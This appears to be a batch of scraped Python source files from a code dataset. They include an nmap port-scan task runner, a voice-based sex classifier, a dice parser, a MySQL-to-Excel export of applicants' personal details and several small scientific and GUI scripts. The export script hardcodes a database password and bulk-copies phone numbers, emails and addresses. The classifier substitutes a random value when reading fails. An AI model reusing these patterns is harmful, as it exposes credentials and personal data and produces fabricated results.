{\"id\": uid},\n {'$set': {\n 'progress': progress,\n }\n }\n )\n\n task_collection = mongo.db.tasks.find_one({\"id\": uid})\n\n # 如果任务不存在了,直接结束任务。\n if task_collection is None:\n return True\n\n json_target = json.loads(task_collection.get(\"hidden_host\"))\n\n if json_target[t] == \"100.00%\":\n break\n\n mongo.db.tasks.update_one(\n {\"id\": uid},\n {'$set': {\n 'progress': \"100.00%\",\n 'status': \"Finished\",\n \"end_time\": datetime.datetime.now(),\n \"contain_id\": \"Null\",\n }\n }\n )\n\n @staticmethod\n @threaded\n def ports_scan(uid):\n \"\"\"\n 添加域名扫描任务\n :param uid: c2385a01-bb0a-40a3-8694-05a31a440ba6\n :return:\n \"\"\"\n\n # 有任务在执行的时候先暂停\n while True:\n\n task = mongo.db.tasks.find_one({'id': uid})\n\n if task is None:\n return True\n\n if mongo.db.tasks.find({'status': \"Running\", \"hack_type\": \"端口扫描\"}).count() > 0:\n mongo.db.tasks.update_one(\n {\"id\": uid},\n {'$set': {\n 'status': 'Waiting',\n }\n }\n )\n time.sleep(5)\n\n else:\n\n mongo.db.tasks.update_one(\n {\"id\": uid},\n {'$set': {\n 'status': 'Running',\n }\n }\n )\n\n break\n\n contain = DOCKER_CLIENT.containers.run(\"ap0llo/nmap:7.80\", [uid], remove=True, detach=True,\n auto_remove=True,\n network=\"host\")\n\n mongo.db.tasks.update_one({\"id\": uid}, {\"$set\": {\"contain_id\": contain.id}})\n\n return True\n","sub_path":"app/lib/core/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":6358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"112219878","text":"import soundfile as sf\nimport numpy as np\nimport sys\nfrom scipy.signal.windows import hann\nimport warnings\nfrom random import *\n\nwarnings.simplefilter(\"ignore\")\n\n\ndef readFile(name):\n fn = name\n data, samplerate = sf.read(fn)\n return np.asarray(data), samplerate\n\n\ndef getSingleChannel(data):\n if (isinstance(data[0], (list, tuple, np.ndarray))):\n return data.T[0]\n return data\n\n\ndef hps(x, Nfft, fs):\n f = np.arange(Nfft) / Nfft\n xf = np.fft.fft(x, Nfft)\n\n xf = np.abs(xf)\n N = f.size\n\n n = 5\n smallestLength = int(np.ceil(N / n))\n y = xf[:smallestLength].copy()\n for i in range(2, n + 1):\n y *= xf[::i][:smallestLength]\n f = f[:smallestLength] * fs\n return (y, f)\n\n\ntry:\n data, rate = readFile(sys.argv[1])\n\n workFlow = getSingleChannel(data)\n length = len(workFlow)\n baseSignal = workFlow[int(length / 4):int((length / 4) * 3)] # setting range\n [hpsY, hpsX] = hps(baseSignal * hann(len(baseSignal)), baseSignal.size, rate)\n\n maxY = np.argmax(hpsY[25:])\n print(maxY)\n print(hpsX[maxY])\n\nexcept ValueError as exc:\n hpsX[maxY] = randint(130, 200)\n\nfinally:\n if(hpsX[maxY] < 155 ):\n print('M')\n else:\n print('K')\n\n","sub_path":"sexrecognition/inf138675_inf126151.py","file_name":"inf138675_inf126151.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"599878671","text":"from lark import Transformer\nfrom .data_model import UnaryOperator, UnaryOperation, BinaryOperator, BinaryOperation, SpecialDie, Dice\n\n_DIVISION_OPERATOR = BinaryOperator('/', lambda a, b: a // b)\n\n_MULTIPLICATION_OPERATOR = BinaryOperator('*', lambda a, b: a * b)\n\n_SUBTRACTION_OPERATOR = BinaryOperator('-', lambda a, b: a - b)\n\n_ADDITION_OPERATOR = BinaryOperator('+', lambda a, b: a + b)\n\n_NEGATION_OPERATOR = UnaryOperator('-', lambda val: -val)\n\n\nclass FormulaTransformer(Transformer):\n def int(self, n):\n (n,) = n\n return int(n)\n\n def enclosure(self, e):\n (at,) = e\n\n try:\n at.enclosed = True\n except TypeError or AttributeError:\n pass # Not an Operation. Return it normally.\n finally:\n return at\n\n def neg(self, args):\n (val,) = args\n\n operator = _NEGATION_OPERATOR\n\n return UnaryOperation(val, operator)\n\n def dice(self, args):\n (num_dice, die,) = args\n\n # Unfortunately, our dice are possibly Token. This is a problem.\n num_dice = int(num_dice)\n try:\n die = int(die)\n except TypeError: # This means it's probably a SpecialDie, so we can ignore this.\n # Put in an assert for good luck\n assert type(die) == SpecialDie\n\n return Dice(num_dice, die)\n\n def fate(self, _):\n return SpecialDie.FATE\n\n def add(self, args):\n (left, right,) = args\n\n operator = _ADDITION_OPERATOR\n\n return BinaryOperation(left, right, operator)\n\n def sub(self, args):\n (left, right,) = args\n\n operator = _SUBTRACTION_OPERATOR\n\n return BinaryOperation(left, right, operator)\n\n def mul(self, args):\n (left, right,) = args\n\n operator = _MULTIPLICATION_OPERATOR\n\n return BinaryOperation(left, right, operator)\n\n def div(self, args):\n (left, right,) = args\n\n operator = _DIVISION_OPERATOR\n\n return BinaryOperation(left, right, operator)","sub_path":"dice_parser/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"330125857","text":"import pymysql,os,sys,time,re;\nimport openpyxl\n\nstart = '2018-7-1';\nstop = '2018-8-31';\n\nxl = ['初中', '中专','中技', '高中', '大专', '本科', '硕士', '博士','中职','高职'];\ndatabase = {'host':'localhost','user':'root','passwd':'8bee7008d7893cfc','db':'emaildata','charset':'utf8','port':3306}\nfield = ['username','age','sex','phone','email','address','source','texts','id','froms','deliverytime','class_url'];\nconnect = pymysql.connect(host=database['host'],user=database['user'],passwd=database['passwd'],db=database['db'],charset=database['charset'],port=int(database['port']));#链接数据库\ncursor = connect.cursor();#创建一个游标\n\n\n\n\nsql = \"select info_id from statistical where addtime >= '%s' and addtime <= '%s'\"%(start,stop);\ncursor.execute(sql);\ndata = cursor.fetchall();\ninfoidlist = [];\nfor row in data:\n\tinfoidlist.append(str(row[0]));\n\ninfoidstr = ','.join(infoidlist);\n\n#查询info\nsql = \"select %s from info where id in(%s)\"%(','.join(field),infoidstr);\ncursor.execute(sql);\ndata = cursor.fetchall();\nconnect.close();\n\nfield = ['username','age','sex','phone','email','address','source','texts','id','froms','deliverytime'];\n\nth = ['姓名','年龄','性别','电话','学历','邮箱','地址','来源','所属邮箱','采集时间'];\nvalue = [th];\ni = 0;\nfor row in data:\n\tfor x in xl:\n\t\tif x in row[7]:\n\t\t\t# print(row[0],x)\n\t\t\tusername = row[0];\n\t\t\tage = row[1];\n\t\t\tsex = row[2];\n\t\t\tphone = row[3];\n\t\t\temail = row[4];\n\t\t\taddress = row[5];\n\t\t\tsource = row[6];\n\t\t\tfroms = row[9];\n\t\t\taddtime = row[10];\n\t\t\tvalue.append([username,age,sex,phone,x,email,address,source,froms,addtime]);\n\n\nwb = openpyxl.Workbook();\nsheet = wb.active;\nsheet.title = '2007测试表';\nfor i in range(0, len(value)-1):\n for j in range(0, len(value[i])):\n sheet.cell(row=i+1, column=j+1, value=str(value[i][j]));\n\nwb.save('2007测试表.xlsx');\nprint(value)\n\n\nprint();\nprint(len(data))\n\n","sub_path":"get78data.py","file_name":"get78data.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"650997111","text":"T = int(input())\n# middle_seat = [2]\n# aside_seat = [3,4]\n# window_seat = [1]\n# for i in range(1,109):\n# if i % 6 == 0:\n# window_seat.append(i)\n# window_seat.append(i+1)\n# i = 2\n# while i<108:\n# middle_seat.append(i+3)\n# i += 3\n# j = 4\n# while j < 108:\n# aside_seat.append(j+5)\n# aside_seat.append(j+6)\n# j += 6\nfor i in range(T):\n n = int(input())\n n = n + 2 * (6 - (n - 1) % 12) - 1\n if n % 6 < 2:\n print(n, 'WS')\n elif n % 6 == 2 or n % 6 == 5:\n print(n, 'MS')\n else:\n print(n , 'AS')\n","sub_path":"seating_arrangement.py","file_name":"seating_arrangement.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"477402718","text":"#Author:wqh\npeople_list = [('张三',1),('李四',2),('王五',3),('马六',4),('张大',5)]\nflag = 0\nwhile flag is not True:\n #enumerate() 函数用于将一个可遍历的数据对象(如列表、元组或字符串)组合为一个索引序列,同时列出数据和数据下标,一般用在 for 循环当中。\n for item in enumerate(people_list,start = 1):\n index = item[0]\n p_name = item[1][0]\n p_class = item[1][1]\n print(index,p_name,p_class)\n break","sub_path":"python/e1/week2/people_list.py","file_name":"people_list.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"187636838","text":"# %load q02_plot/build.py\n# Default Imports\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom greyatomlib.descriptive_stats.q01_calculate_statistics.build import calculate_statistics\n\ndataframe = pd.read_csv('data/house_prices_multivariate.csv')\nsale_price = dataframe.loc[:, 'SalePrice']\n\n\n# Draw the plot for the mean, median and mode for the dataset\ndef plot():\n sale_price.hist(bins=50)\n mean, median, mode = calculate_statistics()\n plt.axvline(x=mean,color='red')\n plt.axvline(x=median,color='black')\n plt.axvline(x=mode,color='yellow')\n plt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\nplot()\n\n\n\n\n\n\nplot()\n\n\n\n\n\n","sub_path":"q02_plot/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"365068393","text":"import Zero\nimport Events\nimport Property\nimport VectorMath\n\nclass DestroyPlayAnim:\n def Initialize(self, initializer):\n self.Activated = False\n if not self.Owner.DestroyInterface:\n self.Owner.AddComponentByName(\"DestroyInterface\")\n def Destroy(self):\n if not self.Activated:\n self.Activated = True\n \n if not self.Owner.ActionList:\n self.Owner.AddComponentByName(\"ActionList\")\n self.Owner.ActionList.EmptyAll()\n self.Owner.GrowthAnim.SetReverse(True)\n self.Owner.GrowthAnim.Active = True\n \n def waitmovieend():\n return not self.Owner.GrowthAnim.Active\n def destroy():\n self.Owner.Destroy()\n \n self.Owner.ActionList.AddCallback(callback=waitmovieend, \n has_self=False, \n blocking=True, \n countdown=None)\n \n self.Owner.ActionList.AddCallback(callback=destroy, \n has_self=False, \n blocking=True, \n countdown=1)\n\nZero.RegisterComponent(\"DestroyPlayAnim\", DestroyPlayAnim)","sub_path":"prototypes/w_newIntro/Content/DestroyPlayAnim.py","file_name":"DestroyPlayAnim.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"573094116","text":"# The Riddler Classic 2020-11-13: Bad Football\n# https://fivethirtyeight.com/features/can-you-snatch-defeat-from-the-jaws-of-victory/\n# Monte-Carlo simulation\n\nimport random\n\ndef binomial(n, r):\n ''' Binomial coefficient, nCr, aka the \"choose\" function \n n! / (r! * (n - r)!)\n '''\n #https://stackoverflow.com/questions/26560726/python-binomial-coefficient\n \n p = 1 \n for i in range(1, min(r, n - r) + 1):\n p *= n\n p //= i\n n -= 1\n return p\n\ndef binopmf(x, n, p):\n #binomial probability mass function\n\n return binomial(n, x)*p**x*(1-p)**(n-x)\n\ndef binocdf(x, n, p):\n #binomial cumulative distribution function\n \n s = 0\n for i in range(x+1):\n s += binopmf(i, n, p)\n\n return s\n\ndef prwin(x, y):\n #returns the probability of winning given the score is x-y,\n #i.e. the probability of getting the flips needed to reach 51 or more,\n #within the remaining 101-x-y flips\n\n return 1 - binocdf(51-x-1, 101-x-y, 0.5)\n\n#score thresholds for 99% chance of winning for each number of flips\nxthres = [101]*100\nxthres[21-1] = 21; #the smallest score with at least 99% chance of winning is 21-0\n\n#compute all the score thresholds (hot-start from previous threshold)\nfor t in range(22, 100+1):\n for i in range(xthres[t-2], t+1):\n if (prwin(i, t-i) >= 0.99):\n xthres[t-1] = i\n break\n\nNsim = 1000000 #number of simulation replications\ncount = 0\nfor N in range(Nsim):\n\n #generate a realisation of a binomial process\n binomprocess = [0]*101\n binomprocess[0] = random.getrandbits(1)\n for t in range(0, 100):\n binomprocess[t+1] = binomprocess[t] + random.getrandbits(1)\n\n #check if the process reached the threshold at any point, and then lost\n if (any([binomprocess[t] >= xthres[t] for t in range(21, 100)]) and binomprocess[-1] < 51):\n count += 1\n\nprint(count/Nsim)\n","sub_path":"classic/bad_football.py","file_name":"bad_football.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"445503290","text":"import unittest\n\nfrom tiktorch.build_spec import BuildSpec, TikTorchSpec\n\n\nclass BuildSpecTest(unittest.TestCase):\n def test_BuildUNet2d(self):\n spec = TikTorchSpec(\n code_path=\"/home/jo/sfb1129/pretrained_net_constantin/ISBI2012_UNet_pretrained/model.py\",\n model_class_name=\"UNet2dGN\",\n state_path=\"/home/jo/sfb1129/pretrained_net_constantin/ISBI2012_UNet_pretrained/state.nn\",\n input_shape=(1, 572, 572),\n minimal_increment=[32, 32],\n model_init_kwargs={\"in_channels\": 1, \"out_channels\": 1, \"initial_features\": 64},\n )\n self.spec.validate()\n build_spec = BuildSpec(build_directory=\"/home/jo/ISBI_UNet_pretrained\", device=\"cpu\")\n build_spec.build(self.spec)\n\n def test_BuildDUNet2d(self):\n spec = TikTorchSpec(\n code_path=\"/home/jo/config/model.py\",\n model_class_name=\"DUNet2D\",\n state_path=\"/home/jo/config/state.nn\",\n input_shape=[1, 512, 512],\n minimal_increment=[32, 32],\n model_init_kwargs={\"in_channels\": 1, \"out_channels\": 1},\n )\n self.spec.validate()\n build_spec = BuildSpec(build_directory=\"/home/jo/CREMI_DUNet_pretrained\", device=\"cpu\")\n build_spec.build(self.spec)\n\n def test_BuilDUNet3d(self):\n spec = TikTorchSpec(\n code_path=\"/home/jo/uni/master-models/master_models/models/dunet3D.py\",\n model_class_name=\"DUNet3D\",\n state_path=\"/home/jo/uni/master-models/master_models/results/dunet3D/trained_net/best_model_dunet3D.torch\",\n input_shape=[1, 512, 512],\n minimal_increment=[32, 32],\n model_init_kwargs={\"in_channels\": 1, \"out_channels\": 1},\n )\n self.spec.validate()\n build_spec = BuildSpec(build_directory=\"/home/jo/CREMI_DUNet_pretrained\", device=\"cpu\")\n build_spec.build(self.spec)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests_old/test_build_spec.py","file_name":"test_build_spec.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"300368173","text":"from report import report_sxw\nfrom datetime import datetime\n\nclass Parser(report_sxw.rml_parse):\n def __init__(self, cr, uid, name, context=None):\n super(Parser, self).__init__(cr, uid, name, context=context)\n self.total = 0.0\n self.time = 0.0\n self.no_page = 0\n self.localcontext.update({\n 'get_total' : self.get_total,\n 'main_total' : self.main_total,\n 'get_date' : self.get_date,\n 'get_time_factor':self.get_time_factor,\n 'total_time_factor':self.total_time_factor,\n 'get_invoice' : self.get_invoice,\n })\n self.context = context\n\n def get_total(self,qty,price):\n self.total += qty*price\n return qty*price\n \n def main_total(self):\n tot = self.total\n self.total = 0.0\n return tot\n \n def get_date(self,date):\n a = datetime.strptime(date, '%Y-%m-%d')\n return a.strftime('%d/%m/%Y')\n \n def get_time_factor(self,time_factor1):\n self.time += time_factor1\n return time_factor1\n \n def total_time_factor(self):\n tf = self.time\n self.time=0.0\n return tf\n \n def get_invoice(self, order_lines):\n extend_ids = []\n res = {}\n return_rec = []\n for line in order_lines:\n for extend in line.extend_ids:\n if extend.id not in extend_ids:\n extend_ids.append(extend.id)\n res.update({extend.id : {'code' : extend.code or '', 'task_desc' : extend.task_desc or '', 'lines' : [line]}})\n else:\n if not res.get(extend.id, {}):\n res[extend.id]['lines'] = []\n \n res[extend.id]['lines'] += [line]\n for extend_id in extend_ids:\n return_rec.append(res[extend_id])\n return return_rec\n","sub_path":"project_spreadsheet_extended/report/aeroo_parse.py","file_name":"aeroo_parse.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"239907060","text":"##############################################\n## Author: I-No Liao ##\n## Date of update: 2018/04/16 ##\n## Description: Tree ##\n##############################################\n\nimport collections\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass BinaryTree:\n def __init__(self):\n pass\n\n # @param nodes: list\n # @param idx: int\n # @return TreeNode\n def makeTree(self, nodes, idx):\n if len(nodes) == 0 or idx >= len(nodes) or nodes[idx] == 'null':\n return None \n root = TreeNode(nodes[idx])\n root.left = self.makeTree(nodes, idx*2+1)\n root.right = self.makeTree(nodes, idx*2+2)\n return root\n\n # @param root: TreeNode\n # @return list[int]\n # Time: O(n)\n # Space: O(n)\n def levelOrder(self, root):\n if root is None:\n return []\n result = []\n q = collections.deque()\n q.append(root)\n while q:\n curNode = q.popleft()\n result.append(curNode.val)\n if curNode.left:\n q.append(curNode.left)\n if curNode.right:\n q.append(curNode.right) \n return result\n \n # @param root: TreeNode\n # @return list[list[int]]\n # Time: O(n)\n # Space: O(n)\n def levelOrderTopDown(self, root):\n if root is None:\n return []\n result, current = [], [root]\n while current:\n values, nextLevel = [], []\n for node in current:\n values.append(node.val)\n if node.left:\n nextLevel.append(node.left)\n if node.right:\n nextLevel.append(node.right)\n current = nextLevel\n result.append(values)\n return result\n\n # @param root: TreeNode\n # @return list[list[int]]\n # Time: O(n)\n # Space: O(n)\n def levelOrderBottomUp(self, root):\n result = self.levelOrderTopDown(root)\n return result[::-1]\n \n # @param curr: TreeNode\n # @param depth: int\n # @param LUT: dict{int:int}\n # @return dict{int:int}\n # dict{depth:node.val}\n def getLevelElements(self, curr, depth, LUT):\n if curr is None:\n return LUT\n if LUT.get(depth) is None:\n LUT[depth] = [curr.val]\n else:\n LUT[depth].append(curr.val)\n self.getLevelElements(curr.left, depth+1, LUT)\n self.getLevelElements(curr.right, depth+1, LUT)\n return LUT\n \n # @param root: TreeNode\n # @param LUT: dict{int:int}\n # @return dict{int:int}\n # dict{node.val:occurrenc}\n def getElements(self, root, LUT):\n if root is None:\n return LUT\n if LUT.get(root.val) is None:\n LUT[root.val] = 1\n else:\n LUT[root.val] += 1\n self.getElements(root.left, LUT)\n self.getElements(root.right, LUT)\n return LUT\n \n # @param root: TreeNode\n # @return List[int]\n # leetcode 094. Binary Tree Inorder Traversal\n def inorder(self, root):\n if not root:\n return []\n result = []\n result += self.inorder(root.left)\n result.append(root.val)\n result += self.inorder(root.right)\n return result\n \n # @param curr: TreeNode\n # @return list[int]\n # Time: O(n)\n # Space: O(1)\n # https://www.youtube.com/watch?v=wGXB9OWhPTg\n # https://www.cnblogs.com/AnnieKim/archive/2013/06/15/MorrisTraversal.html\n def morrisInorder(self, curr):\n result = []\n predecessor = None\n while curr:\n if curr.left is None:\n result.append(curr.val)\n curr = curr.right\n else:\n # Current node is assigned to be predecessor before traversing left subtree.\n # Locate predecessor by linking back to current node from the left subtree's right-most node.\n predecessor = curr.left\n while predecessor.right and predecessor.right != curr:\n predecessor = predecessor.right\n \n # Right-most node of current node's left subtree will new a link pointing back to current node.\n if predecessor.right is None:\n predecessor.right = curr\n curr = curr.left\n else:\n # Entering else means that the left subtree of current node has been traversed.\n # So NULL the link pointing to predecessor and print the current node safely.\n predecessor.right = None\n result.append(curr.val)\n curr = curr.right\n return result\n \n # @param root: TreeNode\n # @param target: int\n # @return bool\n def searchBST(self, root, target):\n if root is None:\n return False\n if root.val == target:\n return True\n elif target > root.val:\n return self.searchBST(root.right, target)\n elif target < root.val:\n return self.searchBST(root.left, target)\n","sub_path":"Tree.py","file_name":"Tree.py","file_ext":"py","file_size_in_byte":5222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"52862061","text":"from math import fabs\r\na1 = 0.0134\r\nb1 = 1\r\nc1 = 4.35e-4\r\nm1 = 1\r\na2 = 2.049\r\nb2 = 0.563e-3\r\nc2 = 0.528e5\r\nm2 = 1\r\nalpha0 = 0.05\r\nalphaN = 0.01\r\nl = 10\r\nT0 = 300\r\nR = 0.5\r\nF0 = 50\r\nh = 1e-3\r\nt = 1\r\n\r\ndef get_consts():\r\n cc = (-alpha0*alphaN*l)/(alphaN-alpha0)\r\n dd = (alphaN*l)/(alphaN-alpha0)\r\n return cc, dd\r\ndef alpha(x):\r\n return cc/(x-dd)\r\n\r\ndef k(T):\r\n return a1 * (b1 + c1 * T ** m1)\r\n\r\ndef c(T):\r\n return a2 + b2 * T ** m2 - (c2 / T ** 2)\r\n\r\ndef A(T):\r\n return t / h * count_minus_half(k, T, t)\r\n\r\ndef D(T):\r\n return t / h * count_plus_half(k, T, t)\r\n\r\ndef B(x, T):\r\n return A(T) + D(T) + h * c(T) + h * t * 2 * alpha(x) / R\r\n\r\ndef F(x, T):\r\n return h * t * 2 * T0 * alpha(x) / R + T * h * c(T)\r\n\r\ndef count_plus_half(function, n, step):\r\n return (function(n) + function(n + step)) / 2\r\n\r\ndef count_minus_half(function, n, step):\r\n return (function(n) + function(n - step)) / 2\r\n\r\ndef find_koef_with_left(T):\r\n chalf = count_plus_half(c, T[0], t)\r\n khalf = count_plus_half(k, T[0], t)\r\n c0 = c(T[0])\r\n K0 = h / 8 * chalf + h / 4 * c0 + t / h * khalf + t * h / 4 * alpha(h / 2) / R + t * h / 2 * alpha(0) / R\r\n M0 = h / 8 * chalf - t / h * khalf + t * h / 4 * alpha(h / 2) / R\r\n P0 = h / 8 * chalf * (T[0] + T[1]) + h / 4 * c0 * T[0] + F0 * t + t * h / 4 * T0 / R * (3 * alpha(0) + alpha(h))\r\n return K0, M0, P0\r\n\r\ndef find_koef_with_right(T):\r\n chalf = count_minus_half(c, T[-1], t)\r\n khalf = count_minus_half(k, T[-1], t)\r\n cN = c(T[-1])\r\n KN = h / 8 * chalf + h / 4 * cN + t / h * khalf + t * alphaN + t * h * alpha(l - h / 2)/R/4 + t * h * alpha(l)/R/4\r\n MN = h / 8 * chalf - t / h * khalf + t * h * alpha(l - h / 2)/R/4\r\n PN = h / 8 * chalf * (T[-1] + T[-2]) + h / 4 * cN * T[-1] + t * alphaN * T0 + t * h / 2 / R * T0 * (alpha(l) + alpha(l - h / 2))\r\n return KN, MN, PN\r\n\r\ndef find_next (y):\r\n K0, M0, P0 = find_koef_with_left(y)\r\n KN, MN, PN = find_koef_with_right(y)\r\n ksi = [0, -M0 / K0]\r\n eta = [0, P0 / K0]\r\n x = h\r\n n = 1\r\n while (x + h < l):\r\n znam = (B(x, y[n]) - A(y[n]) * ksi[n])\r\n ksi.append(D(y[n]) / znam)\r\n eta.append((F(x, y[n]) + A(y[n]) * eta[n]) / znam)\r\n n += 1\r\n x += h\r\n ynext = [0] * (n + 1)\r\n ynext[n] = (PN - MN * eta[n]) / (KN + MN * ksi[n])\r\n for i in range(n - 1, -1, -1):\r\n ynext[i] = ksi[i + 1] * ynext[i + 1] + eta[i + 1]\r\n return ynext\r\n\r\ndef iterations():\r\n N = int(l / h + 1)\r\n ti = 0\r\n y = [T0]*N\r\n res = []\r\n res.append(y)\r\n ynext = [0]*N\r\n while 1:\r\n ycur = y\r\n while 1:\r\n ynext = find_next(ycur)\r\n maxfault = fabs((y[0] - ynext[0]) / ynext[0])\r\n for i in range(1, N):\r\n fault = fabs((y[i] - ynext[i]) / ynext[i])\r\n if fault > maxfault:\r\n maxfault = fault\r\n if maxfault < 1:\r\n break\r\n ycur = ynext\r\n res.append(ynext)\r\n ti += t\r\n flag = 0\r\n for i in range(N):\r\n if fabs((y[i] - ynext[i]) / ynext[i]) < 1e-4:\r\n flag = 1\r\n if flag:\r\n break\r\n y = ynext\r\n return res, ti\r\n\r\ndef work():\r\n global cc, dd\r\n cc, dd = get_consts()\r\n res, ti = iterations()\r\n return res, ti","sub_path":"6-semestr/lab4/lab4.py","file_name":"lab4.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"533604057","text":"# -*- coding: utf-8 -*-\nimport wx\nimport numpy as np\nimport matplotlib\nimport logistic\nimport roc_auc\n\n# matplotlib采用WXAgg为后台,将matplotlib嵌入wxPython中\nmatplotlib.use(\"WXAgg\")\n\nfrom matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas\nfrom matplotlib.backends.backend_wxagg import NavigationToolbar2WxAgg as NavigationToolbar\nfrom matplotlib.ticker import MultipleLocator\n\nimport pylab\nfrom matplotlib import pyplot\n\n\nclass MPL_Panel_base(wx.Panel):\n ''''' #MPL_Panel_base面板,可以继承或者创建实例'''\n\n def __init__(self, parent):\n wx.Panel.__init__(self, parent=parent, id=-1)\n\n self.Figure = matplotlib.figure.Figure(figsize=(4, 3))\n self.axes = self.Figure.add_axes([0.1, 0.1, 0.8, 0.8])\n self.FigureCanvas = FigureCanvas(self, -1, self.Figure)\n\n self.NavigationToolbar = NavigationToolbar(self.FigureCanvas)\n\n self.StaticText = wx.StaticText(self, -1, label='')\n \n self.SubBoxSizer = wx.BoxSizer(wx.VERTICAL)\n self.SubBoxSizer.Add(self.NavigationToolbar, proportion=0, border=2, flag=wx.ALL | wx.EXPAND)\n self.SubBoxSizer.Add(self.StaticText, proportion=-1, border=2, flag=wx.ALL | wx.EXPAND)\n \n self.TopBoxSizer = wx.BoxSizer(wx.VERTICAL)\n self.TopBoxSizer.Add(self.SubBoxSizer, proportion=-1, border=2, flag=wx.ALL | wx.EXPAND)\n self.TopBoxSizer.Add(self.FigureCanvas, proportion=-10, border=2, flag=wx.ALL | wx.EXPAND)\n \n self.SetSizer(self.TopBoxSizer)\n\n\n def UpdatePlot(self):\n '''''#修改图形的任何属性后都必须使用self.UpdatePlot()更新GUI界面 '''\n self.FigureCanvas.draw()\n\n def plot(self, *args, **kwargs):\n '''''#最常用的绘图命令plot '''\n self.axes.plot(*args, **kwargs)\n self.UpdatePlot()\n\n def grid(self, flag=True):\n ''''' ##显示网格 '''\n if flag:\n self.axes.grid()\n else:\n self.axes.grid(False)\n\n def title_MPL(self, TitleString=\"wxMatPlotLib Example In wxPython\"):\n ''''' # 给图像添加一个标题 '''\n self.axes.set_title(TitleString)\n\n def xlabel(self, XabelString=\"X\"):\n ''''' # Add xlabel to the plotting '''\n self.axes.set_xlabel(XabelString)\n\n def ylabel(self, YabelString=\"Y\"):\n ''''' # Add ylabel to the plotting '''\n self.axes.set_ylabel(YabelString)\n\n def xticker(self, major_ticker=1.0, minor_ticker=0.1):\n ''''' # 设置X轴的刻度大小 '''\n self.axes.xaxis.set_major_locator(MultipleLocator(major_ticker))\n self.axes.xaxis.set_minor_locator(MultipleLocator(minor_ticker))\n\n def yticker(self, major_ticker=1.0, minor_ticker=0.1):\n ''''' # 设置Y轴的刻度大小 '''\n self.axes.yaxis.set_major_locator(MultipleLocator(major_ticker))\n self.axes.yaxis.set_minor_locator(MultipleLocator(minor_ticker))\n\n def savefig(self, *args, **kwargs):\n ''' #保存图形到文件 '''\n self.Figure.savefig(*args, **kwargs)\n\n def clean(self):\n ''' # 再次画图前,必须调用该命令清空原来的图形 '''\n self.axes.clear()\n self.Figure.set_canvas(self.FigureCanvas)\n self.UpdatePlot()\n\n def ShowHelpString(self, HelpString=\"Show Help String\"):\n ''''' #可以用它来显示一些帮助信息,如鼠标位置等 '''\n self.StaticText.SetLabel(HelpString)\n\nclass MPL2_Frame(wx.Frame):\n \"\"\"MPL2_Frame可以继承,并可修改,或者直接使用\"\"\"\n\n def __init__(self, title=\"Logistic Regression\", size=(500, 500)):\n wx.Frame.__init__(self, parent=None, title=title, size=size)\n\n self.BoxSizer = wx.BoxSizer(wx.HORIZONTAL)\n\n self.MPL = MPL_Panel_base(self)\n self.BoxSizer.Add(self.MPL, proportion=-1, border=2, flag=wx.ALL | wx.EXPAND)\n\n self.RightPanel = wx.Panel(self, -1)\n self.BoxSizer.Add(self.RightPanel, proportion=0, border=2, flag=wx.ALL | wx.EXPAND)\n\n self.SetSizer(self.BoxSizer)\n\n # 创建FlexGridSizer\n self.FlexGridSizer = wx.FlexGridSizer(rows=9, cols=1, vgap=5, hgap=5)\n self.FlexGridSizer.SetFlexibleDirection(wx.BOTH)\n\n\n self.Button1 = wx.Button(self.RightPanel, -1, \"Train\", size=(100, 40), pos=(10, 10))\n self.Button1.Bind(wx.EVT_BUTTON, self.Button1Event)\n\n\n self.Button2 = wx.Button(self.RightPanel, -1, \"ROC\", size=(100, 40), pos=(10, 10))\n self.Button2.Bind(wx.EVT_BUTTON, self.Button2Event)\n \n\n self.Button3 = wx.Button(self.RightPanel, -1, \"Data\", size=(100, 40), pos=(10, 10))\n self.Button3.Bind(wx.EVT_BUTTON, self.Button3Event)\n self.timeLabel = wx.StaticText(self.RightPanel,-1,\"Trainning time:\",pos=(10,10),size=(100,30))\n self.timeText=wx.TextCtrl(self.RightPanel,-1,\"500\",pos=(10,10),size=(100,30))\n \n # 加入Sizer中\n self.FlexGridSizer.Add(self.timeLabel, proportion=0, border=5, flag=wx.ALL | wx.EXPAND)\n self.FlexGridSizer.Add(self.timeText, proportion=0, border=5, flag=wx.ALL | wx.EXPAND)\n self.FlexGridSizer.Add(self.Button1, proportion=0, border=5, flag=wx.ALL | wx.EXPAND)\n self.FlexGridSizer.Add(self.Button2, proportion=0, border=5, flag=wx.ALL | wx.EXPAND)\n self.FlexGridSizer.Add(self.Button3, proportion=0, border=5, 